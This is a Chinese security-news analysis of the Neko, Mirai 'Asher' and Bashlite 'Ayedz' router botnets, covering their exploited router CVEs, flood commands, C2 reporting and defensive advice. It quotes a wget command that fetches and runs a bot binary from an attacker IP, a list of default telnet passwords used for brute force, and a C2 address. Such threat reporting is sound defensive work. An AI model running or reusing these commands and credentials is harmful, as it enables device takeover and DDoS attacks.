前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >三款恶意软件同时目标锁定路由器

三款恶意软件同时目标锁定路由器

作者头像
FB客服
发布于 2019-09-03 10:12:16
发布于 2019-09-03 10:12:16
1.4K00
代码可运行
举报
文章被收录于专栏:FreeBufFreeBuf
运行总次数:0
代码可运行

近期发现了3款恶意软件变种——Neko,Mirai和Bashlite。在2019年7月22日,我们发现了Neko僵尸网络的恶意软件样本,并马上开始对其进行分析,接下来我们又发现了另外一个样本,相比之前增加了额外的漏洞利用方法。7月30日,又出现了一个名为“Asher”的Mirai变种,而在这之后,又发现了一个名为“Ayedz”的Bashlite变种。列出的这些恶意软件变种可以将路由器感染为僵尸网络中的设备,能够发起分布式拒绝服务(DDoS)攻击。

Neko

7月22日,我们的蜜罐检测到一个僵尸网络的恶意软件样本,x86.neko(被Trend Micro检测为Backdoor.Linux.NEKO.AB),该样本具有弱口令爆破的功能,之后会执行以下命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”
代码语言:javascript
代码运行次数:0
运行
复制

我们的研究表明这个僵尸网络恶意软件在多种处理器架构下都有相应版本存在。根据分析,我们发现Neko僵尸网络能够执行多条后门指令:既能执行shell命令,又能发起UDP和UPD-HEX泛洪攻击,从而致瘫路由器正常处理和响应信息的能力。Neko还有结束进程(程序中的“killer”功能)的功能。同时其内部还存有一个可扩展的“死亡名单”——包含其他恶意软件相关的进程列表,如有存在即会结束相关进程。对Neko僵尸网络更深入的代码分析显示它还带有一个能够查找多种漏洞利用方式的扫描器,从而使其能够传染到其他有漏洞的设备中。

1、Eir WAN端远程命令注入(TR-064)——Eir D1000路由器的一个广域网(WAN)端RCE漏洞 2、HNAP SOAPAction-Header 命令执行(CVE-2015-2051)——由错误处理恶意HTTP请求造成的多个D-Link路由器的RCE漏洞 3、华为路由器HFG532——任意命令执行(CVE-2017-17215)——由验证某个配置文件不当造成的华为HG532上的RCE漏洞 4、GPON路由器——认证绕过/命令注入(CVE-2018-10561,CVE-2018-10562)——由认证绕过和命令注入造成的DASAN GPON家用路由器的RCE漏洞 5、Linksys E系列——远程代码执行——由未经身份认证和操作系统命令注入造成的RCE漏洞 6、MVPower Shell命令执行——利用了MVPower数字视频录像机(DVRs)中未经身份认证的RCE漏洞 7、ThinkPHP 5.0.23/5.1.31 RCE ——开源web开发框架ThinkPHP 5.0.23/5.1.31的RCE漏洞 8、Realtek SDK – Miniigd UPnP SOAP 命令执行(CVE-2014-8361)——使用了Realtek SDK中的miniigd程序的设备,由未经身份认证和操作系统命令注入造成RCE漏洞

除了以上的漏洞利用,我们还发现Neko僵尸网络同时扫描了有漏洞的Africo设备。我们还无法确定Neko为了扫描哪款Africo设备,同时我们注意到这一扫描和任何一个漏洞利用都没有什么联系。但是,我们发现这一漏洞的结构和网件DGN1000/DGN2200等DGN设备的未认证RCE漏洞有相似之处。

图1 Neko僵尸网络恶意软件代码显示其是如何扫描Africo设备的

7月29日,蜜罐收集到了一个升级的Neko僵尸网络恶意软件样本(检测为Backdoor.Linux.NEKO.AC)。这一次,文件使用了UPX进行加壳保护,并把UPX的特征魔数(UPX!)进行了修改,从而防止被脱壳。

图2 UPX加壳并修改了UPX特征魔数的Neko僵尸网络恶意软件代码

我们发现这个新的样本的扫描功能更加强大了,并且使用了更多的漏洞利用方式进行感染传播。有趣的是,其漏洞利用列表现已加入网件DGN1000/DGN2200——而该漏洞结构和之前说的Africo扫描具有相似之处。

图3 Neko僵尸网络恶意软件代码显示其是如何扫描网件DGN1000/DGN2200的

新版本的Neko也对多种CCTV-DVR设备和网件R7000、R6400路由器(2016-6277)进行了扫描。

图4和图5 Neko僵尸网络恶意软件代码显示其是如何扫描多种CCTV-DVR设备和网件R7000、R6400路由器的

Neko变种对“awsec”也进行扫描,而这一漏洞结构和Vacron NVR RCE相似。

图6 Neko僵尸网络恶意软件代码显示其是如何扫描“awsec”的

此外,该Neko变种还会尝试扫描“cisco”和“wap54g”。但是,根据分析,这两条命令都无法成功实现漏洞利用。“Cisco”尝试使用CVE-2018-15379——Cisco Prime Infrastructure中的HTTP web服务器存在目录权限配置不当的问题,从而导致RCE。但是该样本中的攻击载荷未使用正确的URL路径,因此漏洞利用没有成功。

图7 Neko僵尸网络恶意软件代码显示其是如何扫描“cisco”的

“wap54g”攻击载荷的HTTP头和消息体格式也出现了问题,可能导致了对Linksys WAP54Gv3远程调试Root Shell漏洞的利用失败。

图8 Neko僵尸网络恶意软件代码显示其是如何扫描“wap54g”的

Mirai变种“Asher”

7月30日,发现了另一个路由器恶意软件——Mirai变种(被Trend Micro检测为Backdoor.Linux.MIRAI.VWIRC)。类似与Mirai,该变种会感染带有Busybox的设备,Busybox是一个为资源有限的设备提供的软件集。该变种会首先检查有无Busybox——执行“/bin/busybox {any string}”命令,如果设备系统给出响应“{any string} applet not found”,恶意软件就会继续它的操作。该变种的作者使用{any string}的部分来给恶意软件命名,在这个样本中,使用的是“Asher”。

图9 检查BusyBox是否存在的命令截图

“Asher”变种能够通过爆破以下telnet登录口令的方式对路由器进行渗透:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
123452011vsta2601hx4321admin
daemondefaultguest
OxhlwSG8
pass
password
root
S2fGqNFs
support D13hh[
synnet
t0talc0ntr0l4!
taZz@23495859tlJwpbo6
vizxv
xc3511
代码语言:javascript
代码运行次数:0
运行
复制

我们发现Asher通过扫描以下路由器漏洞进行利用和传播。可以看到它和Neko存在两个相似的漏洞利用:

图10 Asher样本扫描的漏洞

1、GPON路由器——认证绕过/命令注入(CVE-2018-10561,CVE-2018-10562)——由认证绕过和命令注入造成的DASAN GPON家用路由器的RCE漏洞

2、MVPower Shell命令执行——利用了MVPower DVR TV-7104HE 1.8.4 115215B9数字视频录像机中未经身份认证的RCE漏洞

3、Realtek SDK – Miniigd UPnP SOAP 命令执行(CVE-2014-8361)——使用了Realtek SDK中的miniigd程序的设备,由未经身份认证和操作系统命令注入造成RCE漏洞

Bashlite变种“Ayedz”

8月6日,检测到又一个路由器上的僵尸网络恶意软件样本,而这次是一个Bashlite的变种(被Trend Micro检测为Backdoor.Linux.BASHLITE.SMJC,Backdoor.Linux.BASHLITE.SMJC8,和Backdoor.Linux.BASHLITE.SMJC4),基于这个恶意软件的文件名,我们推测它为“Ayedz” 。执行时,Ayedz会通过46216端口发送有关感染设备的以下信息,给IP地址为167[.]71[.]7[.]231的主机:

图14 Bashlite变种Ayedz用来回传信息所使用的命令

1、设备——如果“/usr/sbin/telnetd”文件存在,则其“getDevice”功能会返回一个“SSH”字符串,否则会返回一个“Uknown Device”字符串。

2、文件——设备是否存在任何下列的文件:

/usr/bin/python

/usr/bin/python3

/usr/bin/perl

3、Linux发行版本——当感染设备的Linux版本时openSUSE,Red Hat Enterprise Linux(RHEL),CentOSGentoo Linux,UbuntuDebian, 或者未知

4、端口——如果找到了上述的4个文件,其“getPorz”功能返回会一个“22”字符串,否则返回“Uknown Device”字符串

对Ayedz样本的分析显示,它能够运行多个发起DDoS攻击的后门指令。我们也发现Ayedz提供了多个攻击/泛洪选项和其他命令,例如:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
CLOUDFLARE – 绕过CloudFlare保护的HTTP泛洪
CNC – 设置C&C
HTTPHTTP 泛洪
RAIDSTD + TCP 泛洪
STDSTD 泛洪
STOMPSTD + UDP 泛洪STOP – 停止僵尸行为
TCPTCP SYN 泛洪
UDPUDP 泛洪UPDATE –从C&C进行更新

解决方案

保护路由器免受类似Neko,Mirai和Bashlite等恶意软件的威胁

尽管厂商在保护路由器和其他设备的安全性上扮演着很重要的角色,用户和商业用户也需采用良好的安全习惯来抵御类似Neko,Mirai和Bashlite等恶意软件:

1、选择一个会持续给产品打补丁的值得信赖的厂商 2、经常升级设备(如路由器)固件和软件,经常更换用来登录这些设备的口令 3、使用加密,确保设备连接安全 4、配置路由器,使其更好抵御攻击行为 5、禁用设备中过期或不必要的组件,仅使用来自可信源的合法应用 6、在家庭网络和接入的设备中部署提供额外安全保护的工具

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-09-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
注意-polaris僵尸网络正在攻击全球Netlink路由器
近几年,越来越多的僵尸网络逐渐把物联网设备纳入其攻击的目标,其攻击的流程、时效性均在不断发生变化。近日,我们发现了针对Netlink GPON路由器RCE漏洞的利用行为,本文将通过脆弱性、暴露情况以及威胁分析三个方面,叙述本次发现的相关活动。
绿盟科技研究通讯
2020/04/26
1.4K0
注意-polaris僵尸网络正在攻击全球Netlink路由器
Gafgyt重用Mirai代码分析
Gafgyt(又名Bashlite)是著名的恶意软件家族,主要针对物联网设备发起攻击,例如华为路由器、Realtek 路由器和华硕网络设备等。Gafgyt 还使用很多漏洞(CVE-2017-17215、CVE-2018-10561)用于载荷投递。
FB客服
2021/07/27
1.1K0
Gafgyt重用Mirai代码分析
新的Mirai僵尸网络至少利用了三个全新漏洞
Fortinet的安全专家发现了一种新的变体Mirai僵尸网络,称为“Wicked Mirai”,它包括新的漏洞同时传播一个新的僵尸程序。
FB客服
2018/07/30
5520
新的Mirai僵尸网络至少利用了三个全新漏洞
滥用ThinkPHP漏洞的僵尸网络Hakai和Yowai
网络犯罪分子正在利用一个在2018年12月被发现和已修补的ThinkPHP漏洞传播Yowai(Mirai变种)和Hakai(Gafgyt变种)两种僵尸网络病毒。
FB客服
2019/03/08
1K0
滥用ThinkPHP漏洞的僵尸网络Hakai和Yowai
2018 年 IoT 那些事儿
本文作者:murphyzhang、xmy、fen 2018年,是 IoT 高速发展的一年,从空调到电灯,从打印机到智能电视,从路由器到监控摄像头统统都开始上网。随着 5G 网络的发展,我们身边的 IoT 设备会越来越多。与此同时,IoT 的安全问题也慢慢显露出来。 腾讯安全云鼎实验室对 IoT 安全进行了长期关注,本文通过云鼎实验室听风威胁感知平台[注1]收集的 IoT 安全情报进行分析,从 IoT 的发展现状、IoT 攻击的常见设备、IoT 攻击的主要地区和 IoT 恶意软件的传播方式等方面进行介绍。
云鼎实验室
2018/12/30
1.2K0
2018 年 IoT 那些事儿
GPON Home Gateway 远程命令执行漏洞被利用情况
2018/04/30,vpnMentor公布了 GPON 路由器的高危漏洞:验证绕过漏洞(CVE-2018-10561)和命令注入漏洞(CVE-2018-10562)。由于只需要发送一个请求,就可以在 GPON路由器 上执行任意命令,所以在上一篇文章《GPON Home Gateway 远程命令执行漏洞分析》,我们给出了僵尸网络的相关预警。
Seebug漏洞平台
2018/05/14
2.2K4
Mirai和Gafgyt僵尸网络新变种近期十分活跃
安全专家警告称,广大用户近期应该小心Mirai和Gafgyt僵尸网络了,因为这两个臭名昭著的物联网僵尸网络又开始活跃了起来。
FB客服
2018/07/31
7800
Mirai和Gafgyt僵尸网络新变种近期十分活跃
新型Enemybot DDoS僵尸网络借用Mirai和Gafgyt攻击代码
近日,有研究显示,一个从事加密挖矿攻击和分布式拒绝服务(DDoS)攻击的威胁组织或与一个名为Enemybot的新型僵尸网络或有关,该僵尸网络自上个月以来就一直被观察到有奴役路由器和物联网设备的行为。
FB客服
2022/06/08
6750
新型Enemybot DDoS僵尸网络借用Mirai和Gafgyt攻击代码
2020年3月网络安全态势分析
总体看三月份的新增漏洞呈上升趋势,新增高危漏洞113个,主要分布在微软、Adobe、Moxa、Videolabs实验室、VISAM、Siemens、Rockwell、D-Link、Linux、Vmware等厂商的主要产品中。
绿盟科技安全情报
2020/05/08
7360
2020年3月网络安全态势分析
【格物猎踪】“老树新花”——新武器已更新,目标TVT DVR
2019年10月,我们捕获到针对TVT DVR设备的探测活动(《一个月内首现三类漏洞探测活动,僵尸网络又在酝酿攻击?》[1]),其恶意载荷位于POST请求的body中,尝试在DVR上使用nc命令建立一个反向shell(通常针对物联网设备的漏洞探测,僵尸网络会直接投递样本,建立反向shell的攻击行为非常少见)。
绿盟科技研究通讯
2020/07/29
1.9K0
【格物猎踪】“老树新花”——新武器已更新,目标TVT DVR
针对DVR设备的新BotenaGo恶意软件变种
近期,威胁分析人员发现了BotenaGo僵尸网络恶意软件的一种新变种,它是迄今为止最隐秘的变种,任何反病毒引擎都无法检测到它的运行。BotenaGo是一种相对较新的恶意软件,它是用Google的开源编程语言Golang编写。虽然该僵尸网络的源代码自2021年10月被泄露以来,已经公开了大约半年,但从那时起,已经出现了几个该恶意软件的变种,同时原始恶意软件则继续保持活跃,并添加了针对数百万物联网设备池的漏洞利用。
FB客服
2022/06/08
5340
针对DVR设备的新BotenaGo恶意软件变种
利用主流路由器漏洞传播,Mirai DDoS 恶意软件持续活跃
Bleeping Computer 网站消息,基于 Mirai 的 DDoS 恶意软件僵尸网络 IZ1H9 近期又开始活跃了,为 D-Link、Zyxel、TP-Link、TOTOLINK 等 Linux 路由器“添加”了 13 个新有效载荷。
FB客服
2023/10/17
4540
利用主流路由器漏洞传播,Mirai DDoS 恶意软件持续活跃
IoT 分析 | 路由器漏洞频发,mirai 新变种来袭
作者:murphyzhang、xmy、hjchjcjh  前言: 近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。通过溯源可以发现,本次捕获的蠕虫来自于美国拉斯维加斯的一位名为 Philly 的黑客。 一、Playload 与漏洞分析 样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由
云鼎实验室
2018/11/22
2.8K0
IoT 分析 | 路由器漏洞频发,mirai 新变种来袭
EnemyBot恶意软件增加了针对VMware等关键漏洞的攻击
EnemyBot是一个基于多个恶意软件代码的僵尸网络,它通过迅速增加对最近披露的网络服务器、内容管理系统、物联网和Android设备的关键漏洞的利用来扩大其影响范围。该僵尸网络于3月由 Securonix 的研究人员首次发现,在4份对Fortinet的新样本进行分析时,发现EnemyBot已经集成了十几种处理器架构的漏洞。它的主要目的是发起分布式拒绝服务 (DDoS) 攻击,同时还具有扫描新目标设备并感染它们的模块。
FB客服
2022/06/08
4640
EnemyBot恶意软件增加了针对VMware等关键漏洞的攻击
急需升级,D-Link 路由器漏洞被僵尸网络广泛用于 DDoS 攻击
:新的“FICORA”和“CAPSAICIN”僵尸网络(Mirai 和 Kaiten 的变体)的活动激增。
星尘安全
2024/12/30
1640
急需升级,D-Link 路由器漏洞被僵尸网络广泛用于 DDoS 攻击
全球超过200,000台MicroTik路由器受到僵尸网络恶意软件的控制
近期,专家表示受僵尸网络控制的MicroTik路由器是他们近年来看到的最大的网络犯罪活动之一。根据Avast发布的一项新研究,Glupteba僵尸网络以及臭名昭著的TrickBot恶意软件的加密货币挖掘活动都使用相同的命令和控制(C2)服务器进行分发。Avast的高级恶意软件研究员Martin Hron说,“近230,000个易受攻击的MikroTik路由器受到僵尸网络的控制。”
FB客服
2022/04/12
7320
全球超过200,000台MicroTik路由器受到僵尸网络恶意软件的控制
Moobot 僵尸网络“盯上了”D-Link 路由器
Bleeping Computer 网站披露,上月初,被称为 “MooBot ” 的 Mirai 恶意软件僵尸网络变种在新一轮攻击浪潮中再次出现,以易受攻击的 D-Link 路由器为目标,混合使用新旧漏洞,展开网络攻击。 2021 年 12 月,Fortinet 分析师发现了 MooBot 恶意软件团伙,当时该组织正在针对某厂商摄像头中存在的一个漏洞,进行了 DDoS 攻击。 恶意软件开始针对 D-Link 设备 最近,研究人员发现 MooBot 恶意软件更新了其目标范围。从 Palo Alto Net
FB客服
2023/03/30
5530
Moobot 僵尸网络“盯上了”D-Link 路由器
【格物猎踪】突发-新型Gafgyt僵尸网络变种感染Seowon路由器
2020年10月26日,我们捕获到一个Gafgyt家族DDoS变种开始利用Seowon SlC 130路由器RCE漏洞进行传播。不同于往常,僵尸网络通常在大规模投递样本前进行小规模的漏洞验证,本次捕获到的变种没有任何征兆即爆发了大规模投递样本的情况。该变种VirusTotal检出率为0,共包含12种DDoS方式,除常规的反射攻击方式(SSDP等)外,还包含独特的DDoS方式(STUN等)。本文将通过脆弱性、暴露情况以及威胁分析三个方面,分析本次捕获到的攻击。
绿盟科技研究通讯
2020/11/04
1K0
【格物猎踪】突发-新型Gafgyt僵尸网络变种感染Seowon路由器
原创 | SBIDIOT IoT恶意软件分析
前言:近期,一款专门针对IoT设备的恶意软件开始暗中活动,它被命名为SBIDIOT,造成的主要威胁是分布式拒绝服务(DDos)攻击。目前它在 VirusTotal上的检测数量相对较少,并且网络安全社区也暂时没有和它相关的充分记录。尽管某些物联网僵尸网络专门从事加密货币挖掘或欺诈活动,但与SBIDIOT恶意软件相关联的僵尸网络几乎完全致力于DDoS攻击。
绿盟科技研究通讯
2021/05/11
9950
原创 | SBIDIOT IoT恶意软件分析
《2023年企业IoT和OT威胁报告》:物联网恶意软件攻击增长400%
在这个万物互联的时代,物联网(IoT)设备无疑改变了我们生活、工作和管理运营技术(OT)环境的方式。总体而言,到2027年,全球物联网设备数量预计将超过290亿,比2023年的167亿大幅增加。
FB客服
2023/12/02
2.1K0
《2023年企业IoT和OT威胁报告》:物联网恶意软件攻击增长400%
推荐阅读
相关推荐
注意-polaris僵尸网络正在攻击全球Netlink路由器
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验